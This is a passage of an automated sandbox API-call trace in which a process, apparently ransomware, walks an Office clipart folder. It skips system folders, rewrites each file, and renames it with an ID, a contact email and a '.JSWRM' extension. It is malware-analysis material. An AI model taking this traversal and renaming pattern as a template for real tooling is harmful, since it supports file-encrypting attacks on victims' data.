lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05665_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0093.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05665_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05665_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05665_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0093.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0093.543] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.543] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0093.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.544] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14328) returned 1 [0093.544] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.544] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x37f0) returned 0x24d210 [0093.544] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x37f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x37f0, lpOverlapped=0x0) returned 1 [0093.546] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.546] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x37f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x37f0, lpOverlapped=0x0) returned 1 [0093.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0093.547] CloseHandle (hObject=0x314) returned 1 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0093.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0093.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0093.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0093.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0093.548] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x167c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE05710_.WMF", cAlternateFileName="")) returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2=".") returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="..") returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="...") returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="windows") returned -1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="recovery") returned -1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="perflogs") returned -1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="documents and settings") returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="system volume information") returned -1 [0093.548] lstrcmpiW (lpString1="PE05710_.WMF", lpString2="msocache") returned 1 [0093.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05710_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05710_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05710_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0093.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05710_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05710_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05710_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0093.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0093.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0093.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0093.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.549] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5756) returned 1 [0093.549] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1670) returned 0x205850 [0093.549] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1670, lpOverlapped=0x0) returned 1 [0093.551] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.551] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1670, lpOverlapped=0x0) returned 1 [0093.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0093.551] CloseHandle (hObject=0x314) returned 1 [0093.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0093.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0093.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0093.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0093.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0093.552] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0093.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0093.553] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101bc6d0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101bc6d0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE05869_.WMF", cAlternateFileName="")) returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2=".") returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="..") returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="...") returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="windows") returned -1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="recovery") returned -1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="perflogs") returned -1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="documents and settings") returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="system volume information") returned -1 [0093.553] lstrcmpiW (lpString1="PE05869_.WMF", lpString2="msocache") returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05869_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05869_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05869_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05869_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05869_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05869_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0093.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0093.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0093.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0093.554] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1544) returned 1 [0093.554] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x600) returned 0x2332c0 [0093.554] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x600, lpOverlapped=0x0) returned 1 [0093.556] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.556] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x600, lpOverlapped=0x0) returned 1 [0093.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0093.556] CloseHandle (hObject=0x314) returned 1 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0093.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0093.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0093.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0093.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0093.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0093.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0093.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0093.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0093.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0093.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0093.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0093.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0093.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0093.557] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x101e2909, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x101e2909, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x101e2909, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PE05870_.WMF", cAlternateFileName="")) returned 1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2=".") returned 1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="..") returned 1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="...") returned 1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="windows") returned -1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="recovery") returned -1 [0093.557] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="perflogs") returned -1 [0093.558] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="documents and settings") returned 1 [0093.558] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0093.558] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="system volume information") returned -1 [0093.558] lstrcmpiW (lpString1="PE05870_.WMF", lpString2="msocache") returned 1 [0093.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05870_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05870_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05870_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0093.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05870_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PE05870_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PE05870_.WMF", lpUsedDefaultChar=0x0) returned 12 [0093.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0093.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0093.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0093.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0093.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0093.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf"), dwDesiredAccess=0xc0000000, 